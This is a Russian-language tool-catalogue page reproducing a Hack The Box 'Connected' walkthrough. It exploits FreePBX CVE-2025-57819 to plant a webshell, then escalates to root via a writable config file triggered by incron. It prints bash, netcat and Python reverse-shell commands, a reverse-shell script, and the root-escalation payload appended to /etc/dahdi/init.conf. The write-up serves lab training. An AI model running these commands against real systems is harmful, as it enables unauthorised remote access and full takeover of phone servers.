Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
htb-labs-connected — # Разбор машины Hack The Box Connected: перечисление, эксплуатация CVE-2025-57819, обратная оболочка и повышение привилегий до root через FreePBX и incron. | Kitploit
Инструменты/GitHubGitHub/diegorivas1/htb-labs-connected
Повышение привилегийАнализ уязвимостейЭксплуатацияОбратная инженерияЭксплуатация веб-приложенийСбор информацииCTFТестирование на ПроникновениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Разработка Полезной Нагрузки
GitHubdiegorivas1/htb-labs-connected

htb-labs-connected

# Разбор машины Hack The Box Connected: перечисление, эксплуатация CVE-2025-57819, обратная оболочка и повышение привилегий до root через FreePBX и incron.

Репозиторий
18 ч 22 мин назадЕщё не проверено

HTB: Connected - Выбор редакции

English | Español

HTB Difficulty OS Platform

📋 Содержание

  1. Разведка
  2. Эксплуатация - CVE-2025-57819
  3. Реверс-шелл
  4. Повышение привилегий
  5. Флаги
  6. Структура репозитория
  7. Используемые скрипты и инструменты
  8. Сводка атаки
  9. Ресурсы и источники
  10. Дополнительные примечания

1. Разведка

1.1 Сканирование портов с помощью Nmap

root@kitploit:~
nmap -sV 10.129.81.130

Результаты:

root@kitploit:~
PORT    STATE SERVICE   VERSION
22/tcp  open  ssh       OpenSSH 7.4 (protocol 2.0)
80/tcp  open  http      Apache httpd 2.4.6 (CentOS) PHP/7.4.16
443/tcp open  ssl/https Apache/2.4.6 (CentOS) PHP/7.4.16

1.2 Добавление домена в /etc/hosts

root@kitploit:~
echo "10.129.81.130 connected.htb" >> /etc/hosts

1.3 Перебор каталогов с помощью Gobuster

root@kitploit:~
gobuster dir -u http://connected.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

Ключевые находки:

  • /admin - панель администрирования FreePBX
  • /ucp - Панель управления пользователем
  • /robots.txt - файл robots

2. Эксплуатация - CVE-2025-57819

2.1 Загрузка эксплойта

Клонируйте репозиторий WatchTowr Labs:

root@kitploit:~
git clone https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819.git
cd watchTowr-vs-FreePBX-CVE-2025-57819

2.2 Запуск эксплойта

root@kitploit:~
python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://connected.htb

Ожидаемый результат:

root@kitploit:~
[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[+] VULNERABLE - webshell found: http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=hostname

2.3 Проверка веб-шелла

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=whoami"

Результат:

root@kitploit:~
asterisk

3. Реверс-шелл

3.1 Запуск слушателя на Kali

root@kitploit:~
nc -lvnp 4444

3.2 Внедрение реверс-шелла

Закодированная версия:

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.234%2F4444%200%3E%261%27"

Примечание: Замените 10.10.14.234 на ваш VPN-IP.

3.3 Альтернативы

Netcat

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=nc%20-e%20/bin/bash%2010.10.14.234%204444"

Python

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2210.10.14.234%22%2C4444))%3Bos.dup2(s.fileno()%2C0)%3Bos.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bsubprocess.call([%22/bin/bash%22%2C%22-i%22])%27"

3.4 Полученный шелл

root@kitploit:~
listening on [any] 4444 ...
connect to [10.10.14.234] from (UNKNOWN) [10.129.81.130] 55944
bash: no job control in this shell
[asterisk@connected html]$

4. Повышение привилегий

4.1 Поиск доступных для записи конфигурационных файлов

root@kitploit:~
find /etc -name "*.conf" -writable 2>/dev/null

Ключевой результат:

root@kitploit:~
/etc/dahdi/init.conf

4.2 Проверка incron.d

root@kitploit:~
cat /etc/incron.d/*

Соответствующая запись:

root@kitploit:~
/var/spool/asterisk/sysadmin/dahdi_restart IN_CLOSE_WRITE /usr/sbin/sysadmin_dahdi_restart

4.3 Добавление реверс-шелла в init.conf

root@kitploit:~
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.234/4545 0>&1"' >> /etc/dahdi/init.conf

4.4 Запуск слушателя для root-шелла

root@kitploit:~
nc -lvnp 4545

4.5 Запуск перезапуска службы

root@kitploit:~
echo "Restart" >> /var/spool/asterisk/sysadmin/dahdi_restart

4.6 Получение root-шелла

root@kitploit:~
connect to [10.10.14.234] from (UNKNOWN) [10.129.81.130] 45996
bash: no job control in this shell
[root@connected /]#

4.7 Проверка root-доступа

root@kitploit:~
whoami
# root

id
# uid=0(root) gid=0(root) groups=0(root)

5. Флаги

5.1 Пользовательский флаг

root@kitploit:~
cat /home/asterisk/user.txt
root@kitploit:~
HTB{...user_flag...}

5.2 Root-флаг

root@kitploit:~
cat /root/root.txt
root@kitploit:~
HTB{...root_flag...}

Флаги намеренно исключены из этого репозитория.


6. Структура репозитория

root@kitploit:~
htb-labs-connected/
├── README.md
├── README-ES.md
├── exploits/
│   ├── watchTowr-vs-FreePBX-CVE-2025-57819/
│   ├── CVE-2025-57819-exploit/
│   └── CVE-2025-57819-poc/
├── payloads/
│   └── reverse_shell.sh
├── scans/
│   ├── nmap_scan.txt
│   └── gobuster_results.txt
├── screenshots/
└── flags/

7. Используемые скрипты и инструменты

7.1 Скрипт реверс-шелла

Файл: payloads/reverse_shell.sh

root@kitploit:~
#!/bin/bash

# Reverse shell for HTB Connected
# Usage: ./reverse_shell.sh 10.10.14.234 4444

IP=$1
PORT=$2

if [ -z "$IP" ] || [ -z "$PORT" ]; then
    echo "Usage: $0 <IP> <PORT>"
    exit 1
fi

bash -c "bash -i >& /dev/tcp/$IP/$PORT 0>&1"

7.2 Команды разведки

Файл: scans/nmap_scan.txt

root@kitploit:~
# Full port scan
nmap -sV -p- -T4 10.129.81.130

# Service and default script scan
nmap -sC -sV -p22,80,443 10.129.81.130

7.3 Команды фаззинга

Файл: scans/gobuster_results.txt

root@kitploit:~
# Directory fuzzing
gobuster dir \
    -u http://connected.htb \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
    -x php,txt,html

# Fuzzing the admin directory
gobuster dir \
    -u http://connected.htb/admin \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
    -x php,txt,html,conf,ini,bak

8. Сводка атаки


9. Ресурсы и источники

  • Оригинальный райтап: CyberSaif
  • Эксплойт WatchTowr Labs: GitHub
  • CVE-2025-57819: SentinelOne
  • Консультация по безопасности FreePBX: GitHub

10. Дополнительные примечания

10.1 Если веб-шелл не создан

  • Подождите полные две минуты; эксплойту требуется время для создания артефакта.
  • Проверьте связь:
root@kitploit:~
curl -k https://connected.htb

10.2 Если слушатель не работает

Проверьте ваш VPN-интерфейс:

root@kitploit:~
ip addr show tun0

При необходимости попробуйте другой порт для прослушивания:

root@kitploit:~
4445
8080
1234

10.3 Ключевые файлы на целевой системе

  • /etc/dahdi/init.conf - доступный для записи конфигурационный файл, использованный при повышении привилегий
  • /etc/incron.d/ - каталог конфигурации incron
  • /var/spool/asterisk/sysadmin/dahdi_restart - триггер, используемый для выполнения действия перезапуска
  • /var/www/html/ - корневой каталог веб-сервера

🏁 Заключение

Connected успешно завершена. ✅

Цепочка атак демонстрирует, как открытый экземпляр FreePBX может привести к первоначальному доступу через CVE-2025-57819, с последующим повышением привилегий через доступный для записи конфигурационный файл и триггер на основе incron.

Скачать инструмент
ШагДействиеРезультат
1NmapОткрыты порты 22, 80 и 443
2GobusterОбнаружены /admin, /ucp, /robots.txt
3CVE-2025-57819Веб-шелл от имени asterisk
4Реверс-шеллИнтерактивный шелл от имени asterisk
5Повышение привилегийincron.d → dahdi_restart → init.conf
6RootПолучен root-шелл